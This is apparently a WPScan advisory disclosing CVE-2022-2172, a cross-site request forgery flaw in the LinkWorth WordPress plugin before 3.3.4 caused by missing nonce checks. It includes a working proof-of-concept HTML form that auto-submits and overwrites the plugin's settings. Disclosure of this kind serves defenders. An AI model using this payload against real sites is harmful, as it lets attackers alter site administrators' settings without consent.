WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

LinkWorth Plugin < 3.3.4 - Arbitrary Setting Update via CSRF

Description

The plugin does not implement nonce checks, which could allow attackers to make a logged in admin change settings via a CSRF attack.

Proof of Concept

<form id="test" action="https://example.com/wp-admin/admin.php?page=lw-settings" method="POST">
    <input type="text" name="lw_ops[lw_sidebar]" value="0">
    <input type="text" name="lw_ops[lw_sidebarwidget]" value="0">
    <input type="text" name="lw_ops[lw_linktype]" value="0">
    <input type="text" name="lw_ops[website_id]" value="hacked">
    <input type="text" name="lw_ops[website_hash]" value="hacked">
    <input type="text" name="lw_ops[billboard_base]" value="pages">
    <input type="text" name="lw_ops[lw_linkcolor]" value="1">
    <input type="text" name="lw_ops[lw_linksize]" value="12">
    <input type="text" name="lw_update_settings" value="Update Settings »">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

linkworth-wp-plugin
Fixed in version 3.3.4 - plugin closed

References

CVE
CVE-2022-2172
URL
https://plugins.trac.wordpress.org/changeset?new=2754739%40linkworth-wp-plugin&old=2750802%40linkworth-wp-plugin#file8

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website
https://daniel-ruf.de
Verified

Yes

WPVDB ID
bfb6ed12-ae64-4075-9d0b-5620e998df74

Timeline

Publicly Published

2022-08-01 (about 10 months ago)

Added

2022-08-01 (about 10 months ago)

Last Updated

2023-04-29 (about 29 days ago)

Our Other Services

WPScan WordPress Security Plugin